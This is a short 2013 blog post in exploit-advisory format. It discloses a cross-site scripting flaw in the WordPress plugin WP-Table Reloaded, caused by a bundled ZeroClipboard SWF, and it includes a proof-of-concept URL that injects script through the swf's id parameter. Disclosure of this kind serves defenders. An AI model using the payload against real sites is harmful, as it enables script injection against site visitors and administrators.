Wordpress Plugins - WP-Table Reloaded <== XSS

##################################################
# Description : Wordpress Plugins - WP-Table Reloaded <== XSS
# Version : -
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################

About:
WP-Table Reloaded enables you to create and manage tables in your WP's admin area.
No HTML knowledge is needed. A comfortable backend allows to easily edit table data.
Tables can contain any type of data and additional JavaScript libraries can be used to extend
it with features like sorting, pagination, filtering, and more. You can include the tables into your posts,
on your pages or in text widgets by using a shortcode or a template tag function. Tables can be imported and
exported from/to CSV, XML and HTML.

Vulnerabilities in the WP-Table Reloaded plugin for WordPress,
which can be exploited by malicious people to conduct cross-site scripting attacks.
The vulnerabilities are caused due to a bundled vulnerable version of ZeroClipboard.
Cross-Site Scripting vulnerabilities in ZeroClipboard(http://seclists.org/fulldisclosure/2013/Feb/103)
and in multiple web applications.

Affected products:
Vulnerable are all versions

Affected vendors:
WP-Table Reloaded
http://wordpress.org/plugins/wp-table-reloaded/

Details:
Cross-Site Scripting (WASC-08):
XSS via id parameter and XSS via copying payload into clipboard

POC:
http://site/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height

Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz

Tweet

Postingan terkait:

Ditulis Ryuzaki — Tuesday, August 6, 2013 — Add Comment — exploit, plugin, wordpress, xss